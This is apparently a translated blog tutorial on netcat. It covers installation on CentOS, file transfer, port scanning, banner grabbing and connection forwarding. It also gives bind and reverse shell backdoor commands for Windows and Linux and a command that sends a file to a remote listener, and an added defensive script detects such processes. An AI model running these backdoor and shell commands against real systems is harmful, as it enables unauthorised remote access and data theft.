centos7 nc

centos7 download nc:
wget https://sourceforge.net/projects/netcat/files/netcat/0.7.1/netcat-0.7.1.tar.gz

Extract: tar -zxvf netcat-0.7.1.tar.gz

cd /usr/local

mv netcat-0.7.1 netcat

cd /usr/local/netcat

./configure

Compile: make

Install: make install

Configure: vim /etc/profile

Add the following:

# set netcat path

export NETCAT_HOME=/opt/netcat

export PATH=$PATH:$NETCAT_HOME/bin

Save, exit, and make the configuration take effect:

source /etc/profile

Test:

nc -help    (success)


Base64 conversion
In the terminal, run base64 and type the value to convert:
base64
dangtianpeng
Then press Enter and Ctrl+D to obtain the result.

Based on the TCP/IP protocol (client/server model)

The server transmits data to the client

Transferring information:
Create the server side:
nc -l -p [localPort]
nc -l -p 333 (server IP: 1.1.1.1)

Create the client side (connects to the server):
	nc [remote_addr] [remoteport]
	nc -nv 1.1.1.1 333

Returning a shell:
Create the server side:
nc -l -p [localPort] -e cmd.exe

Create the client side (connects to the server):
	nc [remote_addr] [remoteport]

nc transfers data over the standard input and output streams, so it can be used directly from the command line.

File transfer:
Create the server side (the server receives a file):
nc -l -p [localPort] > outfile.txt
nc -l -p 333 > outfile.txt
Create the client side (sends the file):
nc [remote_addr] [remoteport] < /root/Desktop/flag.txt

If the server is not yet ready to accept connections when the client uses nc to connect,
the client will wait forever, until it connects to the server, ending up in a kind of "suspended animation" state.
Solution: set a wait time
nc -w3 [ip] [port] sets the wait time to 3 seconds; after 3 seconds the client closes the connection

Information gathering with netcat

  1. Scanning the target network
  2. Simple probing of a target port
  3. Grabbing the target's service banner

Port scanning:
nc -v -n -z -w1 [target_ip] [start_target_port-stop_target_port]
-v verbose output, including errors
-n no DNS resolution of the target machine
-z zero I/O mode, dedicated to port scanning: the data sent to the target does not contain any payload,
which speeds up the scan
-w1 timeout of 1 second

Banner grabbing:
echo " " | nc -v -n -w1 [target_ip] [start_target_port-stop_target_port]

Obtaining command execution on the target

Establishing a backdoor on Windows:

  1. Listening backdoor
    nc -l -p 4444 -e cmd.exe
  2. Connecting backdoor
    nc [remote_ip] [remote_port] -e cmd.exe

Establishing a backdoor on Linux:
1. Listening backdoor
nc -l -p 4444 -e /bin/bash
2. Connecting backdoor
nc [remote_ip] [remote_port] -e /bin/bash
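
Seen from the defending side, both backdoor types above are visible in a process listing, because -e and the program it runs stay on the command line. The following is an added example, not part of the original post: a shell function that reads `ps -eo pid,args`-style lines and reports every nc/netcat/ncat process started with -e. The sample listing and the names sample_ps and find_nc_exec are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag netcat processes started with -e (program execution).
# Input format: "PID COMMAND ARGS...", as printed by `ps -eo pid,args`.

# Constructed sample process listing (not captured from a real host).
sample_ps() {
cat <<'EOF'
  812 /usr/sbin/sshd -D
 1370 nc -l -p 4444 -e /bin/bash
 1402 /usr/local/netcat/bin/nc -nv 1.1.1.1 333
 1455 nc -lvp 333
 1500 netcat 10.0.0.5 4444 -e /bin/bash
 1533 nc -w3 -z -v -n 10.0.0.5 20-25
 1600 vim -e notes.txt
EOF
}

# Print "PID<TAB>mode<TAB>program" for each nc/netcat/ncat run with -e.
# mode is "listen" when -l or -L is present, otherwise "connect".
find_nc_exec() {
    awk '
    {
        n = split($2, parts, "/")            # basename of the executable
        exe = parts[n]
        if (exe != "nc" && exe != "netcat" && exe != "ncat") next
        listen = 0; prog = ""
        for (i = 3; i <= NF; i++) {
            if ($i !~ /^-[A-Za-z]+$/) continue        # option clusters only
            if ($i ~ /[lL]/) listen = 1
            if ($i ~ /e$/ && i < NF) prog = $(i + 1)  # -e takes the next word
        }
        if (prog != "")
            printf "%s\t%s\t%s\n", $1, (listen ? "listen" : "connect"), prog
    }'
}

# Stand-alone run over the constructed sample.
sample_ps | find_nc_exec
```

On a live host, feed it real data with `ps -eo pid,args | find_nc_exec`.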

Command parameters

-h  show help for the command parameters
-d  detach from the command window and run in the background
-e  execute a program; used to establish a backdoor
-G  set the gateway; used to get around network restrictions
-g  routing hops
-i  set the interval between lines of data
-l  put netcat in the listening state, waiting for a connection
-L  put netcat in the listening state, waiting for a connection; when the client disconnects, the server returns to the waiting state
-n  netcat only uses IP addresses and no longer does DNS resolution
-o  output the transferred data in hexadecimal
-p  set the local listening port number
-r  use randomized port numbers
-s  set the netcat source address
-t  answer telnet request packets
-u  use UDP mode (netcat defaults to TCP)
-v  display error messages
-w  set the connection timeout in seconds
-z  set scan mode: the packets sent do not contain a payload

Connection forwarding
Used to get around connection restrictions in certain special situations.
echo nc [target] [port] > delay.bat
nc -l -p [localPort] -e delay.bat
When a client connects to this server, the connection is forwarded through this port, so the client ends up connected to the target server.


Origin blog.csdn.net/Aidang/article/details/95065308